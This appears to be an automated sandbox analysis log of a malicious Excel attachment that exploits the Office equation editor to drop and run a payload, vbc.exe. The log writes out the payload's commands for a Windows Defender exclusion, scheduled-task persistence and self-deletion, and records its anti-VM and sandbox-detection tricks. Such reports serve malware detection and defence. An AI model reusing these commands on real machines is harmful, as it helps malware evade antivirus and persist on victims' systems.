          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......x...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.......2.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......x...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............x...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................@.......................0...............x...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................[.......................0...............x...............................Jump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ..................(...............(.....(.P.....0.......(...............G.......................................................................Jump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"Jump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Payment Details.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD45E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@13/26@1/2
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000003.473074012.0000000000930000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.472123384.00000000007D0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.509705783.0000000000C40000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdb source: vbc.exe, 00000009.00000002.508502052.00000000006F9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.506009358.0000000000030000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: vbc[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: vbc.exe.2.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: OmnbtuhFsJys.exe.4.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.vbc.exe.80000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.vbc.exe.80000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.4.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.5.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.3.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.9.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.1.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.7.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.80000.2.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F1298 push esp; retn 0023h4_2_002F1321
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F9B39 push ss; ret 4_2_002F9B40
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F9B02 push ebx; ret 4_2_002F9B03
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F8F9A push edx; ret 4_2_002F8F9B
          Source: C:\Users\Public\vbc.exeCode function: 9_2_004171DD push eax; retf 9_2_004171DE
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00417AC9 push edi; retf 9_2_00417ACE
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A2E3 pushad ; iretd 9_2_0041A2E4
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D4C5 push eax; ret 9_2_0041D518
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D57C push eax; ret 9_2_0041D582
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D512 push eax; ret 9_2_0041D518
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D51B push eax; ret 9_2_0041D582
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ADDFA1 push ecx; ret 9_2_00ADDFB4
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036E9B5 push esp; retn 0000h9_2_0036EAE7
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036EB1E push esp; retn 0000h9_2_0036EB1F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036EB02 push esp; retn 0000h9_2_0036EB03
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0259DFA1 push ecx; ret 11_2_0259DFB4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000A71DD push eax; retf 11_2_000A71DE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA2E3 pushad ; iretd 11_2_000AA2E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AD4C5 push eax; ret 11_2_000AD518
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AD51B push eax; ret 11_2_000AD582
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AD512 push eax; ret 11_2_000AD518
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AD57C push eax; ret 11_2_000AD582
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000A7AC9 push edi; retf 11_2_000A7ACE
          Source: initial sampleStatic PE information: section name: .text entropy: 7.77362197724
          Source: initial sampleStatic PE information: section name: .text entropy: 7.77362197724
          Source: initial sampleStatic PE information: section name: .text entropy: 7.77362197724
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEB
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3028, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000099904 second address: 000000000009990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000099B7E second address: 0000000000099B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2592Thread sleep time: -30293s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2064Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2152Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00409AB0 rdtsc 9_2_00409AB0
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30293Jump to behavior
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000A.00000000.552591069.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
